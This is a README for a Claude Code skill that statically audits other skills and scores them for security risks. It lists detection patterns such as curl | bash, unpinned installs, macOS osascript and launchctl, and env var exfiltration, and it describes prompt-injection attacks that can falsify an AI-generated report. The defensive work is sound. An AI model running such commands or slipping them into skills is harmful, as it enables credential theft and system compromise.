A Claude Code skill that audits one or more Claude Code skills — mapping their execution flow, inventorying their tools, analyzing their scripts, and producing an evidence-based security score.
Disclaimer: Reports produced by this tool are AI-based static analysis — an early warning system, not a security guarantee. False positives and false negatives are possible. Treat findings as starting points for investigation; human expert review is recommended before making installation decisions.
/analyze-skill runs a 9-step analysis on any .skill zip file, skill directory, or SKILL.md:
-
Safe extraction — opens the zip safely before anything is read, blocking path traversal, symlink attacks, and zip bombs
-
Skill profile — what the skill claims to do, what triggers it, and what side effects it declares
-
Behavior map — a step-by-step sequence of everything the skill does when it runs: what it reads, what it calls, what it writes, and in what order
-
Tool inventory — every Claude tool the skill uses, whether it's disclosed in the description, and whether the access level is justified
-
Instruction analysis — a deeper read of the SKILL.md itself, looking for hidden instructions, prompt injection attempts, undisclosed network calls, env var exfiltration, and 7 other patterns
If you read one section of the report, make it this one. Do not delegate it to AI — the score itself can be manipulated by a sophisticated skill. Read the raw evidence yourself. Use your AI to help you understand what a flagged line does, but make the call yourself.
-
Script analysis — line-by-line review of any scripts bundled with the skill, flagging dangerous patterns like
curl | bash, unpinned installs, or writes outside the project directory -
Findings — everything suspicious, ranked CRITICAL / HIGH / MEDIUM / LOW, with the exact line as evidence and a suggested fix; positives are noted too
-
Security score — a 0–100 score across 7 weighted dimensions, resulting in a SAFE / CAUTION / HIGH RISK / CRITICAL verdict
-
Summary — a plain-language install recommendation and the key things to verify manually before proceeding
| Verdict | Score | Meaning |
|---|---|---|
 |
80–100 | Install freely |
 |
60–79 | Review flagged findings before installing |
 |
40–59 | Remediate before use |
 |
0–39 | Do not install |
Any single CRITICAL finding caps the score at 39 regardless of other vectors.
Scores are derived from pattern-matching against a fixed checklist. A skill that avoids all flagged patterns can still be malicious, and a skill that triggers a finding may be completely benign. The score is a risk signal, not a verdict — always read the Instruction Analysis and Findings sections directly before deciding.
Always read the raw Step 5 (Instruction Analysis) section of the report yourself.
| Risk | Mitigation |
|---|---|
| Path traversal in zip | Safe extraction script validates every entry before unpacking |
| Zip bomb | 50 MB total / 10 MB per file hard limits in extraction script |
| Env var exfiltration | Strip credentials before running; extraction script has no env var access |
| Prompt injection → false report | Injection guard in command header; always read Instruction Analysis directly |
| Supply chain in scripts | Patterns: curl | bash, unpinned pip/npm install, dynamic URL construction |
| macOS-specific attacks | Patterns: osascript, launchctl, defaults write, security CLI |
| Instruction-level attacks | 11 patterns checked including trigger-hijack, context-harvest, scope-creep |
No isolation environment eliminates the prompt injection → false report risk. The numeric score can be manipulated. Always read the raw Step 5 (Instruction Analysis) section of the report yourself.
The HTML report has three tabs: Security (score breakdown + findings), Behavior (execution map + tool inventory), and Analysis (instruction and script checklists). Open mockup/skill-audit-analyze-skill-2026-04-29.html in any browser to see a full interactive example based on an audit of the analyze-skill command itself.
When auditing a folder, the report opens on a dashboard that groups all skills by verdict and surfaces cross-cutting findings shared across the skill set. The sidebar lists every skill with its score — click any entry to jump to its full individual analysis, including the behavior map, tool inventory, and instruction checklist.
SKILL.md ← the skill (canonical source)
analyze-skill.skill ← packaged skill (zip of SKILL.md)
mockup/
skill-audit-analyze-skill-2026-04-29.html
← interactive HTML report: audit of analyze-skill itself
README.md
If you already have /analyze-skill installed, audit this skill before installing it:
/analyze-skill https://github.com/PhilBriz78/skill-analyzerOr download analyze-skill.skill and run it locally:
/analyze-skill analyze-skill.skill# Clone the repo
git clone https://github.com/PhilBriz78/skill-analyzer
cd skill-analyzer
# Install globally
mkdir -p ~/.claude/commands
cp SKILL.md ~/.claude/commands/analyze-skill.mdThe command is now available in any Claude Code session as /analyze-skill.
To make the command available only in a specific project:
cd /your/project
mkdir -p .claude/commands
cp /path/to/SKILL.md .claude/commands/analyze-skill.md/analyze-skill path/to/skill.skill
/analyze-skill path/to/skill-directory/
/analyze-skill path/to/SKILL.md
/analyze-skill https://github.com/author/repo/tree/main/skills/my-skill
If no argument is given, Claude Code looks for a SKILL.md in the current directory and asks for confirmation before treating it as an audit target.
The skill includes a built-in injection guard and a safe zip extraction script that validates entries before unpacking. However, for fully untrusted skills from unknown authors, running in an isolated environment is strongly recommended.
Isolation options covered in a forthcoming guide (TBC).